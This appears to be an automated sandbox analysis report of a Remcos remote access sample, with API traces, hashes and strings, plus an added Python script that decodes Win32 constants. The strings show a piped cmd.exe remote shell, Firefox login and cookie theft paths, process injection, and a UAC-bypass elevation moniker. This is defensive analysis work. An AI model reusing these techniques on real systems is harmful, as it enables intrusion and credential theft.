                            • Instruction Fuzzy Hash: 50E06577144A216BB211362A7C49D6F2A18DFD67BA727013BF45486143DE288D0641FA
                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00413569
                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                            • RegCloseKey.KERNELBASE(?), ref: 00413592
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                            • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                            • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                            • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
                            • RegCloseKey.KERNELBASE(?,?,?,0040C19C,00466C48), ref: 00413535
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                            • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                            • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                            • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                            APIs
                            • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                            • RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                            • RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                            • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                            • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                            • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                            Similarity
                            • API ID: _wcslen
                            • String ID: pQG
                            • API String ID: 176396367-3769108836
                            • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                            • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                            • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                            • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                            APIs
                            • GlobalMemoryStatusEx.KERNELBASE(?), ref: 0041B7CA
                            Similarity
                            • API ID: GlobalMemoryStatus
                            • String ID: @
                            • API String ID: 1890195054-2766056989
                            • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                            • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                            • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                            • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                            APIs
                            • GetStdHandle.KERNEL32(000000F6), ref: 00449C3C
                            • GetFileType.KERNELBASE(00000000), ref: 00449C4E
                            Similarity
                            • API ID: FileHandleType
                            • String ID:
                            • API String ID: 3000768030-0
                            • Opcode ID: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                            • Instruction ID: 67a772f1b96ce562b336c628e562ce1c63ba93f9b2d947f4b03656f810f331b8
                            • Opcode Fuzzy Hash: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                            • Instruction Fuzzy Hash: E61160315047524AE7304E3E8CC86677AD5AB56335B380B2FD5B6876F1C638DC82AA49
                            APIs
                            • _free.LIBCMT ref: 004461A6
                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                            • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F02,00000000,0000000F,0042F90C,?,?,004319B3,?,?,00000000), ref: 004461E2
                            Similarity
                            • API ID: AllocateHeap$_free
                            • String ID:
                            • API String ID: 1482568997-0
                            • Opcode ID: faad750e247cad17ebccd4cbcbb14699b820db20798bfdb49a30fe1b63b842b1
                            • Instruction ID: bbbbf11ac8836aedddebace835184d628c0e8eb9448606daf7135ff7baabef38
                            • Opcode Fuzzy Hash: faad750e247cad17ebccd4cbcbb14699b820db20798bfdb49a30fe1b63b842b1
                            • Instruction Fuzzy Hash: ACF0683120051566BF212A16AD01B6F375D8F83B75F17411BF91466292DE3CD911916F
                            APIs
                            • socket.WS2_32(?,00000001,00000006), ref: 00404852
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                              • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                            Similarity
                            • API ID: CreateEventStartupsocket
                            • String ID:
                            • API String ID: 1953588214-0
                            • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                            • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                            • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                            • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
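The argument columns in the API lines above are raw 32-bit stack values, so the registry hive, the access mask and the socket parameters only become readable once the well-known Win32 constants are decoded (for example 80000001 is HKEY_CURRENT_USER, 00020019 is KEY_READ, and socket(?,00000001,00000006) is SOCK_STREAM over IPPROTO_TCP). The Python script below is an added example, not part of the Joe Sandbox report or the analysed sample: it parses lines in the listing format used on this page, including the indented "Part of subcall function" form, and names the constants for a handful of APIs and argument positions. The sample input is copied by hand from this report; the trailing tokens beyond an API's documented parameter count (CreateMutexA takes three, the listing shows sixteen) are kept as-is and not interpreted, and the decoder table is deliberately limited to the calls this page shows.

```python
"""Decode the raw hex arguments in a Joe Sandbox "APIs" listing.

Added example: not part of the Joe Sandbox report or the analysed sample.
It parses lines such as
    RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
and names the well-known Win32 constants for a few APIs and argument slots.
"""
import re
from dataclasses import dataclass, field
from typing import Callable, Optional

LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX32 = re.compile(r"[0-9A-Fa-f]{8}")

# Well-known Windows SDK constants (winreg.h / winsock2.h / winbase.h).
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_COMPOSITE = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
KEY_BITS = [(0x20000, "READ_CONTROL"), (0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE"),
            (0x4, "KEY_CREATE_SUB_KEY"), (0x8, "KEY_ENUMERATE_SUB_KEYS"),
            (0x10, "KEY_NOTIFY"), (0x20, "KEY_CREATE_LINK"),
            (0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY")]
REG_TYPES = {0: "REG_NONE", 1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY",
             4: "REG_DWORD", 7: "REG_MULTI_SZ", 11: "REG_QWORD"}
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTO = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}


def hive(v: int) -> str:
    return HIVES.get(v, f"0x{v:08X}")


def key_access(v: int) -> str:
    # Named composite mask first, otherwise the individual rights bits that are set.
    if v in KEY_COMPOSITE:
        return KEY_COMPOSITE[v]
    names = [n for bit, n in KEY_BITS if v & bit]
    return "|".join(names) if names else f"0x{v:08X}"


def winsock_version(v: int) -> str:
    # WSAStartup takes MAKEWORD(major, minor): major is the low byte.
    return f"Winsock {v & 0xFF}.{(v >> 8) & 0xFF}"


def table(t: dict) -> Callable[[int], str]:
    return lambda v: t.get(v, f"0x{v:08X}")


# api -> {argument index: (parameter name, decoder)}; only documented parameter slots.
DECODERS = {
    "RegOpenKeyExA": {0: ("hKey", hive), 3: ("samDesired", key_access)},
    "RegCreateKeyA": {0: ("hKey", hive)},
    "RegCreateKeyExA": {0: ("hKey", hive), 5: ("samDesired", key_access)},
    "RegSetValueExA": {3: ("dwType", table(REG_TYPES))},
    "socket": {0: ("af", table(AF)), 1: ("type", table(SOCK_TYPE)), 2: ("protocol", table(PROTO))},
    "WSAStartup": {0: ("wVersionRequested", winsock_version)},
    "CreateMutexA": {1: ("bInitialOwner", lambda v: "TRUE" if v else "FALSE")},
}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                    # address of the call instruction ("ref:" column)
    args: list                  # ints for 8-hex-digit tokens, else the raw token ("?", "Exe", ...)
    subcall_of: Optional[int] = None   # set for "Part of subcall function XXXXXXXX" lines
    decoded: dict = field(default_factory=dict)


def parse_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if not m:
        return None
    args = []
    if m.group("args"):
        # The listing prints more stack slots than the API takes; all are kept
        # verbatim and only the indexes present in DECODERS are interpreted.
        for tok in m.group("args").split(","):
            tok = tok.strip()
            args.append(int(tok, 16) if HEX32.fullmatch(tok) else tok)
    call = ApiCall(api=m.group("api"), module=m.group("mod"), ref=int(m.group("ref"), 16),
                   args=args, subcall_of=int(m.group("sub"), 16) if m.group("sub") else None)
    for idx, (name, fn) in DECODERS.get(call.api, {}).items():
        if idx < len(args) and isinstance(args[idx], int):
            call.decoded[name] = fn(args[idx])
    return call


def parse_listing(text: str) -> list:
    return [c for c in (parse_line(ln) for ln in text.splitlines()) if c]


def describe(call: ApiCall) -> str:
    s = f"{call.api}.{call.module} @ 0x{call.ref:08X}"
    if call.decoded:
        s += ": " + ", ".join(f"{k}={v}" for k, v in call.decoded.items())
    return s


# Constructed input: lines copied by hand from this report's listing.
SAMPLE = """\
• RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
• RegCloseKey.KERNELBASE(?), ref: 004135F2
• RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
• CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
• GetLastError.KERNEL32 ref: 0040D083
• socket.WS2_32(?,00000001,00000006), ref: 00404852
  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
"""

if __name__ == "__main__":
    for c in parse_listing(SAMPLE):
        print(describe(c))
```

Running the script prints one line per call, e.g. `RegOpenKeyExA.KERNELBASE @ 0x004135CA: hKey=HKEY_CURRENT_USER, samDesired=KEY_READ` and `RegSetValueExA.KERNELBASE @ 0x004138A0: dwType=REG_DWORD`. Argument slots shown as `?` are left undecoded rather than guessed, and any API not in DECODERS is still parsed (name, module, ref, raw arguments) so the same loop can be pointed at a whole copied listing.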
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                            • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                            • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                            • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                            APIs
                            • GetForegroundWindow.USER32 ref: 0041BAB8
                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                            Similarity
                            • API ID: Window$ForegroundText
                            • String ID:
                            • API String ID: 29597999-0
                            APIs
                            • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                            • WSASetLastError.WS2_32(00000000), ref: 00414F10
                              • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                              • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                              • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                              • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                              • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                              • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                              • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                              • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                            Similarity
                            • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                            • String ID:
                            • API String ID: 1170566393-0
                            APIs
                              • Part of subcall function 00445AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                            • _free.LIBCMT ref: 00450140
                            Similarity
                            • API ID: AllocateHeap_free
                            • String ID:
                            • API String ID: 614378929-0
                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            APIs
                            • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                            Similarity
                            • API ID: Startup
                            • String ID:
                            • API String ID: 724789610-0
                            Similarity
                            • API ID: send
                            • String ID:
                            • API String ID: 2809346765-0
                            Similarity
                            • API ID: recv
                            • String ID:
                            • API String ID: 1507349165-0
                            APIs
                            • SetEvent.KERNEL32(?,?), ref: 00407CB9
                            • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                            • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                              • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                              • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                              • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                              • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                              • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                              • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                              • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                            • DeleteFileA.KERNEL32(?), ref: 00408652
                              • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                              • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                              • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                              • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                            • Sleep.KERNEL32(000007D0), ref: 004086F8
                            • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                              • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                            Similarity
                            • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                            • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                            • API String ID: 1067849700-181434739
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 004056E6
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            • __Init_thread_footer.LIBCMT ref: 00405723
                            • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                            • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                              • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                            • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                            • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                            • CloseHandle.KERNEL32 ref: 00405A23
                            • CloseHandle.KERNEL32 ref: 00405A2B
                            • CloseHandle.KERNEL32 ref: 00405A3D
                            • CloseHandle.KERNEL32 ref: 00405A45
                            Similarity
                            • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                            • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                            • API String ID: 2994406822-18413064
                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 00412106
                              • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                              • Part of subcall function 00413877: RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                              • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                            • CloseHandle.KERNEL32(00000000), ref: 00412155
                            • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                            Similarity
                            • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                            • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                            • API String ID: 3018269243-13974260
                            APIs
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                            • FindClose.KERNEL32(00000000), ref: 0040BBC9
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                            • FindClose.KERNEL32(00000000), ref: 0040BD12
                            Similarity
                            • API ID: Find$CloseFile$FirstNext
                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                            • API String ID: 1164774033-3681987949
                            APIs
                            • OpenClipboard.USER32 ref: 004168C2
                            • EmptyClipboard.USER32 ref: 004168D0
                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                            • GlobalLock.KERNEL32(00000000), ref: 004168F9
                            • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                            • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                            • CloseClipboard.USER32 ref: 00416955
                            • OpenClipboard.USER32 ref: 0041695C
                            • GetClipboardData.USER32(0000000D), ref: 0041696C
                            • GlobalLock.KERNEL32(00000000), ref: 00416975
                            • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                            • CloseClipboard.USER32 ref: 00416984
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            Similarity
                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                            • String ID: !D@
                            • API String ID: 3520204547-604454484
                            APIs
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                            • FindClose.KERNEL32(00000000), ref: 0040BDC9
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                            • FindClose.KERNEL32(00000000), ref: 0040BEAF
                            • FindClose.KERNEL32(00000000), ref: 0040BED0
                            Similarity
                            • API ID: Find$Close$File$FirstNext
                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                            • API String ID: 3527384056-432212279
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                              • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                              • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                            • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                            Similarity
                            • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                            • API String ID: 3756808967-1743721670
                            Similarity
                            • API ID:
                            • String ID: 0$1$2$3$4$5$6$7$VG
                            • API String ID: 0-1861860590
                            APIs
                            • _wcslen.LIBCMT ref: 00407521
                            • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                            Similarity
                            • API ID: Object_wcslen
                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                            • API String ID: 240030777-3166923314
                            APIs
                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                            • GetLastError.KERNEL32 ref: 0041A7BB
                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                            Similarity
                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                            • String ID:
                            • API String ID: 3587775597-0
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                              • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                            • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                            • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                            • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                            • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                            • String ID: lJD$lJD$lJD
                            • API String ID: 745075371-479184356
                            • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                            • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                            • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                            • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                            • FindClose.KERNEL32(00000000), ref: 0040C47D
                            • FindClose.KERNEL32(00000000), ref: 0040C4A8
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: Find$CloseFile$FirstNext
                            • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                            • API String ID: 1164774033-405221262
                            • Opcode ID: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
                            • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                            • Opcode Fuzzy Hash: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
                            • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                              • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                            • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
